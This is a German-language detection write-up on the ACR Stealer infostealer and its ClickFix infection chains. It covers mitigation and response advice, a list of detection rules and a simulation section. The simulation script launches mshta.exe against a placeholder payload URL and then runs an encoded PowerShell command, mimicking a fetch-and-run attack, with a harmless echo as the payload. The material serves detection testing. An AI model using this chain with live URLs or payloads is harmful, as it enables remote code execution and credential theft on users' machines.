ACR-Stealer: Zwei Beobachtete Einbruchsketten Während Erhöhter Bedrohungsaktivität
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
ACR Stealer ist eine Malwarefamilie, die Informationen stiehlt und ClickFix-ähnliche Social-Engineering-Tricks verwendet, um Unternehmensumgebungen anzugreifen. Die Malware arbeitet über zwei Hauptinfektionsketten: eine, die auf WebDAV-basierte Payloads mit Python-Loadern und blockchain-basierter Command-and-Control setzt, und eine andere, die MSHTA mit steganografischer Payload-Zustellung verwendet. Ihr Hauptziel ist das Stehlen von Browser-Anmeldedaten, Authentifizierungstoken und sensiblen Dokumenten.
Untersuchung
Microsoft Defender-Experten beobachteten zwischen Ende April und Mitte Juni 2026 eine erhöhte Aktivität. Die Untersuchung identifizierte zwei separate Ausführungspfade: eine festplattenbasierte Kampagne, die Python und geplante Aufgaben umfasst, und eine fileless Kampagne, die MSHTA und eine In-Memory-Ausführung von Shellcode nutzt. Analysten dokumentierten auch fortschrittliche Ausweichmethoden, einschließlich Timestomping, verschleiertem PowerShell und blockchain-gestützten Dead-Drop-Resolvern.
Minderung
Organisationen sollten Benutzer schulen, ClickFix-Eingabeaufforderungen zu erkennen, und die Ausführung von nicht vertrauenswürdigen Skripten durch Anwendungssteuerung einschränken. Reduzierung der Gefährdung durch Malvertising und Durchsetzung von Webfilterung können helfen, erste Zugriffsversuche zu stören. Durch Härtung von Endpunkten mit der Einschränkung der Abhängigkeit von im Browser gespeicherten Anmeldedaten und der Durchsetzung von Multi-Faktor-Authentifizierung können das Risiko eines Anmeldedatendiebstahls ebenfalls reduziert werden.
Reaktion
Falls diese Aktivität erkannt wird, sollten betroffene Geräte sofort isoliert und alle möglicherweise kompromittierten Anmeldedaten und Token rotiert werden. Sitzungstoken sollten widerrufen werden, und Ermittler sollten ausgehende Verbindungen zu verdächtigen Remote-Shares oder Bild-Hosting-Diensten überprüfen. EDR im Blockmodus sollte verwendet werden, um die Bedrohung einzudämmen und bösartige Artefakte effizient zu entfernen.
Angriffsfluss
Erkennungen
Verdächtiges LOLBAS MSHTA-Ausweichverhalten durch Erkennung der zugehörigen Befehle (über process_creation)
Anzeigen
LOLBAS Conhost (über cmdline)
Anzeigen
Geplante Aufgabe über COM-Objekt (über powershell)
Anzeigen
Mögliche Systeminformationsentdeckung mit WMI-Powershell-Modul (über powershell)
Anzeigen
Erkennung von verschleiertem PowerShell und geplanten Aufgaben, die als Softwareupdates getarnt sind [Windows PowerShell]
Anzeigen
Erkennung der ACR Stealer-Ausführung über ClickFix-Köder [Windows-Prozesserstellung]
Anzeigen
Simulationsausführung
Voraussetzung: Der Telemetrie- & Basislinien-Vorab-Check muss bestanden haben.
Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der Angreifertechnik (TTP), die entwickelt wurde, um die Erkennungsregel auszulösen. Die Befehle und Beschreibungen MÜSSEN direkt die identifizierten TTPs widerspiegeln und darauf abzielen, genau die Telemetriedaten zu erzeugen, die von der Erkennung erwartet werden. Abstrakte oder nicht verwandte Beispiele führen zu Fehldiagnosen.
-
Angriffserzählung & Befehle: Der Angreifer zielt auf einen Benutzer mit einem gefälschten „Browserfehler“ (ClickFix) ab. Sobald der Benutzer den Befehl kopiert und in ein Terminal einfügt, wird
cmd.exeaufgerufen. Der Befehl weistmshta.exean, auf eine entfernte URL zuzugreifen, um ein bösartiges Skript abzurufen. Um einfache Zeichenfolgenerkennung weiter zu umgehen, verwendet das Skriptpowershell.exemit einem codierten Befehl (-Enc) um die ACR Stealer-Malware im Speicher herunterzuladen und auszuführen und so traditionelle dateibasierte Scans zu umgehen. -
Regressionstest-Skript:
# Simulation der ACR Stealer ClickFix-Kette # Schritt 1: Simulation des cmd.exe-Wrappers # Schritt 2: Aufruf von mshta.exe mit einer URL # Schritt 3: Gefolgt von einem codierten PowerShell-Befehl $encodedCommand = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("Write-Host 'Simulating ACR Stealer Payload Execution'")) Start-Process "cmd.exe" -ArgumentList "/c mshta.exe https://example.com/payload.hta & powershell.exe -Enc $encodedCommand" -
Bereinigungskommandos:
# In dieser Simulation werden keine persistenten Dateien erstellt, stellen Sie jedoch sicher, dass keine verwaisten Prozesse verbleiben Stop-Process -Name "mshta" -ErrorAction SilentlyContinue Stop-Process -Name "powershell" -ErrorAction SilentlyContinue